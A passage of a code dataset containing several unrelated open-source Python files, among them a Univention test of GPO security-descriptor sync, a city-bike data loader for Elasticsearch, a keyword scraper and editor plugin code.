univention.uldap\nfrom univention.config_registry import ConfigRegistry\nfrom univention.s4connector import configdb\nfrom univention.testing import utils\nfrom univention.testing.strings import random_username\n\nimport s4connector\n\n\ndef set_ucr(ucr_set, ucr_unset=None, ucr=None):\n if not ucr:\n ucr = ConfigRegistry()\n ucr.load()\n\n previous_ucr_set = []\n previous_ucr_unset = []\n\n if ucr_set:\n if isinstance(ucr_set, str):\n ucr_set = (ucr_set,)\n\n for setting in ucr_set:\n var = setting.split(\"=\", 1)[0]\n new_val = setting.split(\"=\", 1)[1]\n old_val = ucr.get(var)\n if new_val == old_val:\n continue\n\n if old_val is not None:\n previous_ucr_set.append('%s=%s' % (var, old_val))\n else:\n previous_ucr_unset.append('%s' % (var,))\n\n univention.config_registry.handler_set(ucr_set)\n\n if ucr_unset:\n if isinstance(ucr_unset, str):\n ucr_unset = (ucr_unset,)\n\n for var in ucr_unset:\n val = ucr.get(var)\n if val is not None:\n previous_ucr_set.append('%s=%s' % (var, val))\n\n univention.config_registry.handler_unset(ucr_unset)\n\n return (previous_ucr_set, previous_ucr_unset)\n\n\nclass Testclass_GPO_Security_Descriptor:\n\n def __init__(self, udm, ucr=None):\n self.SAM_LDAP_FILTER_GPO = \"(&(objectclass=grouppolicycontainer)(cn=%s))\"\n self.gpo_ldap_filter = None\n self.gponame = None\n\n self.udm = udm\n\n if ucr:\n self.ucr = ucr\n else:\n self.ucr = ConfigRegistry()\n self.ucr.load()\n\n self.adminaccount = utils.UCSTestDomainAdminCredentials()\n self.machine_ucs_ldap = univention.uldap.getMachineConnection()\n\n self.fqdn = \".\".join((self.ucr[\"hostname\"], self.ucr[\"domainname\"]))\n\n self.lp = LoadParm()\n self.lp.load_default()\n\n self.samba_machine_creds = Credentials()\n self.samba_machine_creds.guess(self.lp)\n self.samba_machine_creds.set_machine_account(self.lp)\n self.machine_samdb = SamDB(url=\"/var/lib/samba/private/sam.ldb\", session_info=system_session(), credentials=self.samba_machine_creds, lp=self.lp)\n self.domain_sid = 
security.dom_sid(self.machine_samdb.get_domain_sid())\n self.DA_SID = security.dom_sid(\"%s-%d\" % (self.domain_sid, security.DOMAIN_RID_ADMINS))\n self.DU_SID = security.dom_sid(\"%s-%d\" % (self.domain_sid, security.DOMAIN_RID_USERS))\n\n self.samba_admin_creds = Credentials()\n self.samba_admin_creds.guess(self.lp)\n self.samba_admin_creds.parse_string(self.adminaccount.username)\n self.samba_admin_creds.set_password(self.adminaccount.bindpw)\n self.admin_samdb = SamDB(url=\"/var/lib/samba/private/sam.ldb\", session_info=system_session(), credentials=self.samba_admin_creds, lp=self.lp)\n self.admin_samdb_sdutil = SDUtils(self.admin_samdb)\n\n def restart_s4_connector(self):\n cmd = (\"/etc/init.d/univention-s4-connector\", \"restart\")\n p1 = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, close_fds=True)\n stdout, stderr = p1.communicate()\n if p1.returncode != 0:\n utils.fail(\"Error restarting S4 Connector: %s\\nCommand was: %s\" % (stdout.decode('UTF-8', 'replace'), cmd))\n\n def activate_ntsd_sync(self):\n ucr_set = [\"connector/s4/mapping/gpo/ntsd=true\"]\n self.previous_ucr_set, self.previous_ucr_unset = set_ucr(ucr_set, ucr=self.ucr)\n if self.previous_ucr_unset or self.previous_ucr_set:\n self.restart_s4_connector()\n\n def __enter__(self):\n self.activate_ntsd_sync()\n return self\n\n def __exit__(self, exc_type, exc_value, traceback):\n if exc_type:\n print('GPO Cleanup after exception: %s %s' % (exc_type, exc_value))\n if self.previous_ucr_unset or self.previous_ucr_set:\n set_ucr(self.previous_ucr_set, self.previous_ucr_unset, ucr=self.ucr)\n self.restart_s4_connector()\n self.remove_gpo()\n\n def get_ldb_object(self, dn=None, ldap_filter=None, attrs=None):\n if not attrs:\n attrs = [\"*\"]\n if not ldap_filter:\n ldap_filter = \"(objectClass=*)\"\n\n if dn:\n res = self.machine_samdb.search(base=dn, scope=ldb.SCOPE_BASE, expression=ldap_filter, attrs=attrs)\n else:\n res = self.machine_samdb.search(expression=ldap_filter, 
attrs=attrs)\n\n for ldb_msg in res:\n return ldb_msg\n\n def get_ldb_gpo(self, gponame):\n ldap_filter = filter_format(self.SAM_LDAP_FILTER_GPO, (gponame,))\n attrs = [\"nTSecurityDescriptor\", \"uSNChanged\"]\n ldb_msg = self.get_ldb_object(ldap_filter=ldap_filter, attrs=attrs)\n return ldb_msg\n\n def get_ntsd(self, obj):\n if isinstance(obj, ldb.Message):\n ntsd_ndr = obj[\"nTSecurityDescriptor\"][0]\n ntsd = ndr_unpack(security.descriptor, ntsd_ndr)\n elif isinstance(obj, tuple):\n ntsd_sddl = obj[1].get(\"msNTSecurityDescriptor\", [None])[0]\n if not ntsd_sddl:\n raise ValueError(\"No msNTSecurityDescriptor synchronized\")\n ntsd = security.descriptor.from_sddl(ntsd_sddl.decode('ASCII'), self.domain_sid)\n elif isinstance(obj, str):\n ntsd = security.descriptor.from_sddl(obj, self.domain_sid)\n elif isinstance(obj, bytes):\n ntsd = security.descriptor.from_sddl(obj.decode('ASCII'), self.domain_sid)\n else:\n raise ValueError(\"General ValueError\")\n\n return ntsd\n\n def assert_owner(self, ntsd, expected_sid, logtag='assert_owner'):\n if ntsd.owner_sid != expected_sid:\n utils.fail(\"ERROR: %s: Unexpected owner SID! 
Expected: %s, Found: %s\" % (logtag, expected_sid, ntsd.owner_sid))\n\n def get_ucs_ldap_object(self, ucs_dn):\n res = self.machine_ucs_ldap.search(base=ucs_dn, scope=\"base\", attr=[\"*\"])\n return res[0]\n\n def wait_for_s4connector_sync_to_ucs(self, ldb_msg, logtag=\"wait_for_s4connector_sync_to_ucs\"):\n\n usn = int(ldb_msg[\"uSNChanged\"][0])\n\n configdbfile = '/etc/univention/connector/s4internal.sqlite'\n s4c_internaldb = configdb(configdbfile)\n\n t0 = time.time()\n while int(s4c_internaldb.get(\"S4\", \"lastUSN\")) < usn:\n if time.time() - t0 > 120:\n utils.fail(\"ERROR: %s: Replication takes too long, aborting\" % logtag)\n time.sleep(1)\n time.sleep(15)\n\n def wait_for_object_usn_change(self, ldb_msg, logtag=\"wait_for_object_usn_change\"):\n\n initial_usn = int(ldb_msg[\"uSNChanged\"][0])\n usn = initial_usn\n\n t0 = time.time()\n while usn == initial_usn:\n time.sleep(1)\n if time.time() - t0 > 120:\n utils.fail(\"ERROR: %s: Replication takes too long, aborting\" % logtag)\n ldb_msg = self.get_ldb_object(dn=str(ldb_msg.dn), attrs=[\"uSNChanged\"])\n usn = int(ldb_msg[\"uSNChanged\"][0])\n time.sleep(15)\n\n def remove_gpo(self, critical=True):\n if self.gponame:\n cmd = (\n \"samba-tool\", \"gpo\", \"del\", self.gponame,\n \"-k\", \"no\",\n \"-H\", \"ldap://%s\" % (self.fqdn,),\n \"--username\", self.adminaccount.username,\n \"--password\", self.adminaccount.bindpw)\n\n p1 = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, close_fds=True)\n stdout, stderr = p1.communicate()\n if p1.returncode != 0:\n if critical:\n utils.fail(\"Error removing GPO using samba-tool: %s\\nCommand was: %s\" % (stdout.decode('UTF-8', 'replace'), cmd))\n else:\n self.gponame = None\n\n def create_gpo(self, logtag=\"create_gpo\"):\n display_name = 'ucs_test_gpo_' + random_username(8)\n\n cmd = (\n \"samba-tool\", \"gpo\", \"create\", display_name,\n \"-k\", \"no\",\n \"-H\", \"ldap://%s\" % (self.fqdn,),\n \"--username\", 
self.adminaccount.username,\n \"--password\", self.adminaccount.bindpw)\n\n p1 = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, close_fds=True)\n stdout, stderr = p1.communicate()\n if p1.returncode != 0:\n utils.fail(\"ERROR: %s: creating GPO using samba-tool: %s\\nCommand was: %s\" % (logtag, stdout.decode('UTF-8', 'replace'), cmd))\n\n stdout = stdout.decode('UTF-8', 'replace').rstrip()\n try:\n self.gponame = '{' + re.search('{(.+?)}', stdout).group(1) + '}'\n self.gpo_ldap_filter = filter_format(self.SAM_LDAP_FILTER_GPO, (self.gponame,))\n except AttributeError as ex:\n utils.fail(\"Could not find the GPO reference in the STDOUT '%s' of the 'samba-tool', error: '%s'\" % (stdout, ex))\n\n def modify_udm_object(self, modulename, **kwargs):\n cmd = self.udm._build_udm_cmdline(modulename, 'modify', kwargs)\n child = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=False)\n (stdout, stderr) = child.communicate()\n\n if child.returncode:\n raise udm_test.UCSTestUDM_ModifyUDMObjectFailed({'module': modulename, 'kwargs': kwargs, 'returncode': child.returncode, 'stdout': stdout.decode('UTF-8', 'replace'), 'stderr': stderr.decode('UTF-8', 'replace')})\n\n def modify_sd_on_ucs_ldap_gpo(self, ucs_dn, ucs_ntsd):\n self.modify_udm_object('container/msgpo', dn=ucs_dn, msNTSecurityDescriptor=ucs_ntsd.as_sddl())\n\n\nclass Testcase_GPO_Security_Descriptor_UDM_to_SAM(Testclass_GPO_Security_Descriptor):\n\n def run(self):\n sync_from = \"UDM\"\n sync_to = \"SAM\"\n print(\"GPO Security Descriptor sync from %s to %s\" % (sync_from, sync_to))\n PHASE = \"preparation\"\n\n self.create_gpo(logtag=PHASE)\n print('GPO Name: %s' % self.gponame)\n ldb_msg = self.get_ldb_gpo(self.gponame)\n sam_ntsd = self.get_ntsd(ldb_msg)\n self.assert_owner(sam_ntsd, self.DA_SID, logtag=PHASE)\n self.wait_for_s4connector_sync_to_ucs(ldb_msg, logtag=PHASE)\n\n sam_ntsd = self.get_ntsd(ldb_msg)\n self.assert_owner(sam_ntsd, self.DA_SID, 
logtag=PHASE)\n\n # we need the exact case of the DN otherwise udm cli will fail\n temp_dn = str(ldb_msg.dn).lower().replace(self.ucr[\"samba4/ldap/base\"].lower(), self.ucr[\"ldap/base\"])\n ucs_dn = self.machine_ucs_ldap.searchDn(base=temp_dn, scope='base')[0]\n\n uldap_msg = self.get_ucs_ldap_object(ucs_dn)\n try:\n ucs_ntsd = self.get_ntsd(uldap_msg)\n except ValueError as ex:\n utils.fail(\"ERROR: %s: %s\" % (PHASE, ex.args[0]))\n if ucs_ntsd.as_sddl() != sam_ntsd.as_sddl():\n utils.fail(\"ERROR: %s: NT Security descriptor differs between %s and %s\" % (PHASE, sync_from, sync_to))\n\n PHASE = \"test\"\n\n ucs_ntsd.owner_sid = self.DU_SID\n self.modify_sd_on_ucs_ldap_gpo(ucs_dn, ucs_ntsd)\n\n uldap_msg = self.get_ucs_ldap_object(ucs_dn)\n try:\n ucs_ntsd = self.get_ntsd(uldap_msg)\n except ValueError as ex:\n utils.fail(\"ERROR: %s: %s\" % (PHASE, ex.args[0]))\n self.assert_owner(ucs_ntsd, self.DU_SID, logtag=PHASE)\n\n self.wait_for_object_usn_change(ldb_msg, logtag=PHASE)\n\n ldb_msg = self.get_ldb_gpo(self.gponame)\n sam_ntsd = self.get_ntsd(ldb_msg)\n\n if ucs_ntsd.as_sddl() != sam_ntsd.as_sddl():\n utils.fail(\"ERROR: %s: NT Security descriptor not synchronized from %s to %s\" % (PHASE, sync_from, sync_to))\n\n PHASE = \"cleanup\"\n\n ucs_ntsd.owner_sid = self.DA_SID\n self.modify_sd_on_ucs_ldap_gpo(ucs_dn, ucs_ntsd)\n\n uldap_msg = self.get_ucs_ldap_object(ucs_dn)\n try:\n ucs_ntsd = self.get_ntsd(uldap_msg)\n except ValueError as ex:\n utils.fail(\"ERROR: %s: %s\" % (PHASE, ex.args[0]))\n self.assert_owner(ucs_ntsd, self.DA_SID, logtag=PHASE)\n\n self.wait_for_object_usn_change(ldb_msg, logtag=PHASE)\n ldb_msg = self.get_ldb_gpo(self.gponame)\n sam_ntsd = self.get_ntsd(ldb_msg)\n\n if ucs_ntsd.as_sddl() != sam_ntsd.as_sddl():\n utils.fail(\"ERROR: %s: NT Security descriptor not re-synchronized from %s to %s\" % (PHASE, sync_from, sync_to))\n\n\nclass Testcase_GPO_Security_Descriptor_SAM_to_UDM(Testclass_GPO_Security_Descriptor):\n\n def run(self):\n 
sync_from = \"SAM\"\n sync_to = \"UDM\"\n print(\"GPO Security Descriptor sync from %s to %s\" % (sync_from, sync_to))\n PHASE = \"preparation\"\n\n self.create_gpo(logtag=PHASE)\n print('GPO Name: %s' % self.gponame)\n ldb_msg = self.get_ldb_gpo(self.gponame)\n sam_ntsd = self.get_ntsd(ldb_msg)\n self.assert_owner(sam_ntsd, self.DA_SID, logtag=PHASE)\n self.wait_for_s4connector_sync_to_ucs(ldb_msg, logtag=PHASE)\n\n sam_ntsd = self.get_ntsd(ldb_msg)\n self.assert_owner(sam_ntsd, self.DA_SID, logtag=PHASE)\n\n ucs_dn = str(ldb_msg.dn).lower().replace(self.ucr[\"samba4/ldap/base\"].lower(), self.ucr[\"ldap/base\"].lower())\n uldap_msg = self.get_ucs_ldap_object(ucs_dn)\n try:\n ucs_ntsd = self.get_ntsd(uldap_msg)\n except ValueError as ex:\n utils.fail(\"ERROR: %s: %s\" % (PHASE, ex.args[0]))\n if ucs_ntsd.as_sddl() != sam_ntsd.as_sddl():\n utils.fail(\"ERROR: %s: NT Security descriptor differs between %s and %s\" % (PHASE, sync_from, sync_to))\n\n PHASE = \"test\"\n\n sam_ntsd.owner_sid = self.DU_SID\n self.admin_samdb_sdutil.modify_sd_on_dn(str(ldb_msg.dn), sam_ntsd)\n\n ldb_msg = self.get_ldb_gpo(self.gponame)\n sam_ntsd = self.get_ntsd(ldb_msg)\n self.assert_owner(sam_ntsd, self.DU_SID, logtag=PHASE)\n\n self.wait_for_s4connector_sync_to_ucs(ldb_msg, logtag=PHASE)\n\n uldap_msg = self.get_ucs_ldap_object(ucs_dn)\n try:\n ucs_ntsd = self.get_ntsd(uldap_msg)\n except ValueError as ex:\n utils.fail(\"ERROR: %s: %s\" % (PHASE, ex.args[0]))\n\n if ucs_ntsd.as_sddl() != sam_ntsd.as_sddl():\n print('ucs_ntsd.as_sddl: %s' % ucs_ntsd.as_sddl())\n print('sam_ntsd.as_sddl: %s' % sam_ntsd.as_sddl())\n utils.fail(\"ERROR: %s: NT Security descriptor not synchronized from %s to %s\" % (PHASE, sync_from, sync_to))\n\n PHASE = \"cleanup\"\n\n sam_ntsd.owner_sid = self.DA_SID\n self.admin_samdb_sdutil.modify_sd_on_dn(str(ldb_msg.dn), sam_ntsd)\n\n ldb_msg = self.get_ldb_gpo(self.gponame)\n sam_ntsd = self.get_ntsd(ldb_msg)\n self.assert_owner(sam_ntsd, self.DA_SID, 
logtag=PHASE)\n\n self.wait_for_s4connector_sync_to_ucs(ldb_msg, logtag=PHASE)\n uldap_msg = self.get_ucs_ldap_object(ucs_dn)\n try:\n ucs_ntsd = self.get_ntsd(uldap_msg)\n except ValueError as ex:\n utils.fail(\"ERROR: %s: %s\" % (PHASE, ex.args[0]))\n\n if ucs_ntsd.as_sddl() != sam_ntsd.as_sddl():\n utils.fail(\"ERROR: %s: NT Security descriptor not re-synchronized from %s to %s\" % (PHASE, sync_from, sync_to))\n\n\nif __name__ == \"__main__\":\n s4connector.exit_if_connector_not_running()\n\n with udm_test.UCSTestUDM() as udm:\n with Testcase_GPO_Security_Descriptor_SAM_to_UDM(udm) as test:\n test.run()\n\n with Testcase_GPO_Security_Descriptor_UDM_to_SAM(udm) as test:\n test.run()\n","repo_name":"univention/univention-corporate-server","sub_path":"test/ucs-test/tests/52_s4connector/100sync_gpo_ntsecurity_descriptor.py","file_name":"100sync_gpo_ntsecurity_descriptor.py","file_ext":"py","file_size_in_byte":16159,"program_lang":"python","lang":"en","doc_type":"code","stars":166,"dataset":"github-code","pt":"33"} +{"seq_id":"39105711607","text":"import requests\nimport pandas as pd\nimport time\nfrom datetime import datetime\nimport sys\nimport os\nfrom elasticsearch import Elasticsearch\nfrom elasticsearch import helpers\nfrom elasticsearch_dsl import GeoPoint\n\nes_client = Elasticsearch(http_compress=True)\n\nGeoPoint.to_dict = lambda self: {'lat': self.lat, 'lon': self.lon}\n\ndef get_data():\n url = 'http://api.citybik.es/v2/networks/citybikes-helsinki'\n try:\n res = requests.get(url)\n city_bikes = res.json()\n df = pd.DataFrame.from_dict(city_bikes['network']['stations'])\n df = df[1:].drop('extra', axis=1) #Discard first row, drop 'extra' column\n df['timestamp'] = df['timestamp'].apply(safe_date)\n df['location'] = df[['latitude', 'longitude']].apply(create_geopoint, axis=1)\n return df\n except requests.exceptions.ConnectionError:\n print('{}: Connection failed'.format(stamp))\n sys.exit(1)\n\ndef safe_date(date_value):\n return (\n 
pd.to_datetime(date_value) if not pd.isna(date_value)\n else datetime(1970,1,1,0,0)\n )\n\ndef create_geopoint(row):\n return {'lat': row['latitude'], 'lon': row['longitude']}\n\ndef doc_generator(df):\n df_iter = df.iterrows()\n ts = time.time()\n stamp = datetime.fromtimestamp(ts).strftime('%Y-%m-%d_%H')\n for index, document in df_iter:\n yield {\n \"_index\": 'hsl_bike_{0}'.format(stamp),\n \"_type\": \"_doc\",\n \"_id\" : f\"{document['id']}\",\n \"_source\": document.to_dict(),\n }\n raise StopIteration\n\nif __name__ == '__main__':\n data = get_data()\n helpers.bulk(es_client, doc_generator(data))\n\n","repo_name":"bipartite/hsl_bike2","sub_path":"fetch_bike_data.py","file_name":"fetch_bike_data.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"72920475615","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\n\nimport download\nfrom lxml.etree import HTML\nimport re\nimport time\n\nclass getKeyword(object):\n def __init__(self):\n self.down = download.Download()\n self.kw_list = []\n with open('results.txt','w') as f:\n f.write('')\n\n def get_url(self):\n url = input('请输入要查询的网站(eg:http://www.xxx.com):')\n if url[-1] == '/':\n url = url[:-1]\n domain = re.match('((http|https)://[a-zA-Z1-9]+.).*?$', url).group(1)\n domain = url.replace(domain, '')\n urls_list = []\n url_obj = {\n 'url': url,\n 'domain': domain,\n }\n urls_list.append(url_obj)\n # try:\n # with open('urls.txt') as f:\n # results = f.readlines()\n # for res in results:\n # try:\n # url = res.strip()\n # domain = re.match('(http://[a-zA-Z1-9]+.).*?$', url).group(1)\n # domain = url.replace(domain, '')\n # url_obj = {\n # 'url': url,\n # 'domain': domain,\n # }\n # urls_list.append(url_obj)\n # except:\n # print('该行文本格式有误')\n # print(res)\n # with open('failed_urls.txt', 'a') as ff:\n # ff.write(res)\n # except:\n # print('当前目录没有url.txt文本')\n # time.sleep(60)\n return urls_list\n\n def 
get_keyword(self,response):\n html = HTML(response.text)\n url_list = html.xpath('//a/@href')\n self.parse_keyword(response)\n exits_url = []\n for url in url_list:\n if re.match('^/.*?aspx$',url):\n two_url = 'http://www.aliwuxi.com' + url\n elif re.match('http://.*?aspx$',url):\n two_url = url\n else:\n continue\n\n if two_url in exits_url:\n continue\n else:\n exits_url.append(two_url)\n print(two_url)\n two_response = self.down.get_html(two_url)\n self.parse_keyword(two_response)\n self.kw_list = list(filter(None, self.kw_list))\n self.kw_list = list(set(self.kw_list))\n return self.kw_list\n\n def parse_keyword(self,response):\n html = HTML(response.text)\n domain_kw = html.xpath('string(//meta[@name=\"keywords\"]/@content)').split(',')\n if len(domain_kw) < 1:\n return None\n self.kw_list = self.kw_list + domain_kw","repo_name":"Geek-007/spiders","sub_path":"suchmaschine/getKeyword.py","file_name":"getKeyword.py","file_ext":"py","file_size_in_byte":2711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"37769962424","text":"\nimport string\nfrom concurrent.futures import Future\n\nfrom keypad.api import interactive\nfrom keypad.abstract.code import IndentRetainingCodeModel, AbstractCompletionResults\nfrom keypad.core.syntaxlib import SyntaxHighlighter\nfrom keypad.core.processmgr.client import AsyncServerProxy, RemoteError\nfrom keypad.core.fuzzy import FuzzyMatcher, Filter\nfrom keypad.core.conftree import ConfTree\nfrom keypad.core.executors import SynchronousExecutor\nfrom keypad.buffers import Cursor\n\n\nfrom .modelworker import (InitWorkerTask, \n CompletionTask, \n FindRelatedTask, \n GetDocsTask, \n GetDiagnosticsTask,\n GetCallTipTask)\nfrom .config import CXXConfig \nclass CXXCompletionResults(AbstractCompletionResults):\n def __init__(self, token_start, runner, results):\n '''\n token_start - the (line, col) position at which the token being completed starts\n '''\n 
super().__init__(token_start)\n self._runner = runner\n self._results = results \n self.filter()\n \n def doc_async(self, index):\n '''\n Return a Future for the documentation for a given completion result as a list of \n AttributedString. \n '''\n \n return self._runner.submit(GetDocsTask(self._filt.indices[index]))\n\n @property\n def rows(self):\n '''\n Return a list of tuples of AttributedString containing the contents of \n each column for each row in the completion results.\n '''\n \n return self._filt.rows\n \n def text(self, index):\n '''\n Return the text that should be inserted for the given completion.\n '''\n return self._filt.rows[index][0].text\n\n def filter(self, text=''):\n '''\n Filter the completion results using the given text.\n '''\n \n fm = FuzzyMatcher(text)\n self._filt = fm.filter(self._results, lambda item: item[0].text)\n # sort exact matches first\n self._filt.sort(lambda item: 0 if item[0].text.startswith(text) else 1)\n \n def dispose(self):\n pass\n \n\nclass CXXCodeModel(IndentRetainingCodeModel):\n completion_triggers = ['.', '::', '->']\n call_tip_triggers = ['(', ')']\n line_comment = '//'\n \n def __init__(self, *args, **kw):\n super().__init__(*args, **kw)\n self.cxx_config = CXXConfig.from_config(self.conf)\n self.cxx_config.value_changed.connect(self._update_configuration)\n \n try:\n self.prox = AsyncServerProxy(InitWorkerTask(self.cxx_config))\n self.prox.start()\n# self.prox.submit().result()\n except RemoteError as exc:\n self.prox.shutdown()\n cause = exc.__cause__ or exc\n interactive.run('show_error', cause)\n\n\n \n def submit_task(self, task, transform=None):\n '''\n Public interface for submitting tasks to be run in the completion process.\n \n Task must be a pickleable callable that takes one argument. The argument will\n be a SimpleNamespace object containing a field `engine`. The `engine` field \n contains an instance of `modelworker.Engine`.\n \n The result of the task is returned as a future. 
If a transform is provided, the\n transform will be applied clientside (i.e., not in the completion process) \n before setting the future's result. This means that the transform need not be \n pickleable.\n '''\n \n return self.prox.submit(task, transform)\n\n def _update_configuration(self, k, v):\n self.submit_task(InitWorkerTask(self.cxx_config))\n \n\n def _find_token_start(self, pos):\n c = Cursor(self.buffer).move(pos)\n\n wordchars = string.ascii_letters + string.digits + '_$'\n for i, ch in reversed(list(enumerate(c.line[:c.x]))):\n if ch not in wordchars:\n break\n else:\n i = -1\n \n\n return c.y, i + 1\n \n def completions_async(self, pos):\n '''\n Return a future to the completions available at the given position in the document.\n \n Raise NotImplementedError if not implemented.\n '''\n tstart = self._find_token_start(pos)\n return self.prox.submit(\n CompletionTask(\n self.path,\n tstart,\n [(str(self.path), self.buffer.text)]\n ),\n transform=lambda r: CXXCompletionResults(tstart, self.prox, r)\n )\n \n def find_related_async(self, pos, types):\n '''\n Find related names for the token at the given position. \n \n Raises NotImplementedError by default.\n \n :rtype: concurrent.futures.Future of list of RelatedName\n '''\n \n return self.prox.submit(\n FindRelatedTask(\n types,\n self.path,\n pos,\n [(str(self.path), self.buffer.text)]\n )\n )\n\n \n def highlight(self):\n '''\n Rehighlight the buffer. \n \n Note: This is different than other methods in the code model in that\n it involves mutation of the buffer, and it may be better to make\n the code model a factory for a \"Highlighter\" object. 
\n '''\n\n from .syntax import cpplexer\n \n highlighter = SyntaxHighlighter(\n 'keypad.plugins.cpp.syntax',\n cpplexer(),\n dict(lexcat=None)\n )\n \n highlighter.highlight_buffer(self.buffer)\n \n \n @property\n def can_provide_diagnostics(self):\n return True\n \n def diagnostics_async(self):\n return self.prox.submit(\n GetDiagnosticsTask(\n self.path,\n None,\n [(str(self.path), self.buffer.text)]\n )\n )\n \n @property\n def can_provide_call_tips(self):\n return True\n \n\n def call_tip_async(self, pos):\n c = Cursor(self.buffer).move(pos)\n \n depth = 1\n \n for ch in c.walk(-1):\n if ch == '(':\n depth -= 1\n elif ch == ')':\n depth += 1\n \n if depth == 0:\n break\n \n else:\n # Can't get call tip here. \n return SynchronousExecutor.submit(lambda: None)\n \n start = self._find_token_start(c.pos)\n text = Cursor(self.buffer).move(start).text_to(c)\n\n return self.prox.submit(GetCallTipTask(\n text,\n self.path,\n start,\n [(str(self.path), self.buffer.text)]\n ))\n \n def dispose(self):\n '''\n Release system resources held by the model.\n '''\n \n self.prox.shutdown()\n \n","repo_name":"sam-roth/Keypad","sub_path":"keypad/plugins/cpp/cppmodel.py","file_name":"cppmodel.py","file_ext":"py","file_size_in_byte":7002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"29777867514","text":"from typing import List, Dict, Optional\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\nclass CocoAnnotation(object):\n def __init__(self):\n self.id: int = 0\n self.image_id: int = 0\n self.category_id: int = 0\n self.bbox: Optional[List[float]] = None\n\n def set(self, image_id: int, category_id: int, bbox: List[float], annotation_id: int = 0):\n if annotation_id > 0:\n self.id = annotation_id\n self.image_id = image_id\n self.category_id = category_id\n self.bbox = bbox\n\n def json(self) -> Dict:\n annotation_json = dict()\n annotation_json[\"id\"] = self.id\n annotation_json[\"image_id\"] = 
self.image_id\n annotation_json[\"category_id\"] = self.category_id\n annotation_json[\"bbox\"] = self.bbox\n return annotation_json\n\n\nclass CocoAnnotations(object):\n\n def __init__(self, ds_type: int):\n self.ds_type: int = ds_type\n self.annotations: Dict = dict()\n\n def add(self, annotation_id: int, annotation: CocoAnnotation) -> None:\n annotation.id = annotation_id\n self.annotations[annotation_id] = annotation\n\n def get(self, annotation_id: int) -> Optional[CocoAnnotation]:\n if annotation_id not in self.annotations:\n return None\n return self.annotations[annotation_id]\n\n def json(self, annotation_id: int) -> Optional[Dict]:\n annotation = self.get(annotation_id)\n if not annotation:\n logger.error(f\"annotation_id:{annotation_id} not found\")\n return None\n return annotation.json()\n","repo_name":"naomori/oidconv","sub_path":"src/oidconv/coco_annotation.py","file_name":"coco_annotation.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"20953029482","text":"\"\"\"Client\"\"\"\nimport tcp\n\n\ndef Main():\n # local host IP '127.0.0.1'\n host = '127.0.0.1'\n\n # Define the port on which you want to connect\n port = 3322\n\n client = tcp.TCP_Client(host, port)\n\n # message you send to server\n while client.tcp.connected:\n command = input(\"Enter command: \")\n value = input(\"Enter value: \")\n client.send({command: value})\n\n try:\n data = client.receive()\n print('Received from the server :')\n print(data)\n except tcp.TCPTimeout:\n print('Socket Timeout, awaiting new commands')\n\n # close the connection\n client.close()\n\n\nif __name__ == '__main__':\n Main()\n","repo_name":"HimavaanChandra/laserRobots","sub_path":"TCP/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"33"} +{"seq_id":"15902852991","text":"#!/usr/bin/env 
python\n\"\"\"\nGet server hostname or IP address for the given inventory file and group.\n\nThe server name or IP is printed on stdout on success.\nErrors and help output are printed on stderr.\n\"\"\"\nfrom __future__ import print_function\nimport os\nimport sys\nimport argparse\nfrom os.path import dirname\n\nROOT = dirname(dirname(dirname(os.path.abspath(__file__))))\n\n\nclass ArgParser(argparse.ArgumentParser):\n\n def print_help(self, stream=sys.stderr):\n # print help to stderr by default\n super(ArgParser, self).print_help(stream)\n\n\ndef read_inventory_file(filename):\n \"\"\"\n filename is a path to an ansible inventory file\n\n returns a mapping of group names (\"webworker\", \"proxy\", etc.)\n to lists of hosts (ip addresses)\n\n \"\"\"\n from ansible.inventory import InventoryParser\n\n return {name: [host.name for host in group.get_hosts()]\n for name, group in InventoryParser(filename).groups.items()}\n\n\ndef get_instance_group(instance, group):\n servers = read_inventory_file(\n os.path.join(ROOT, 'fab', 'inventory', instance))\n return servers[group]\n\n\ndef main():\n prog = os.environ.get(\"SCRIPT\", sys.argv[0])\n parser = ArgParser(\n prog=prog,\n usage=\"{prog} [-h] environment [user@]group[:n] [{uprog}_ARGS]\".format(\n prog=prog,\n uprog=prog.rsplit(\"/\", 1)[-1].upper(),\n ),\n formatter_class=argparse.RawDescriptionHelpFormatter,\n )\n parser.add_argument(\"environment\",\n help=\"Environment: production, staging, ...\")\n parser.add_argument(\"group\",\n help=\"Server group: postgresql, proxy, webworkers, ... The server \"\n \"group may be prefixed with 'username@' to login as a specific \"\n \"user and may be terminated with ':' to choose one of \"\n \"multiple servers if there is more than one in the group. 
\"\n \"For example: webworkers:0 will pick the first webworker.\")\n\n args = parser.parse_args()\n group = args.group\n if \"@\" in group:\n username, group = group.split('@', 1)\n username += \"@\"\n else:\n username = \"\"\n if ':' in group:\n group, index = group.rsplit(':', 1)\n try:\n index = int(index)\n except (TypeError, ValueError):\n parser.error(\"Non-numeric group index: {}\".format(index))\n else:\n index = None\n\n try:\n servers = get_instance_group(args.environment, group)\n except IOError as err:\n parser.error(err)\n except KeyError as err:\n parser.error(\"Unknown group: {}\\n\".format(group))\n\n if index is not None and index > len(servers) - 1:\n sys.stderr.write(\n \"Invalid group index: {index}\\n\"\n \"Please specify a number between 0 and {max} inclusive\\n\"\n .format(index=index, max=len(servers) - 1)\n )\n sys.exit(1)\n if len(servers) > 1:\n if index is None:\n sys.stderr.write(\n \"There are {num} servers in the '{group}' group\\n\"\n \"Please specify the index of the server. 
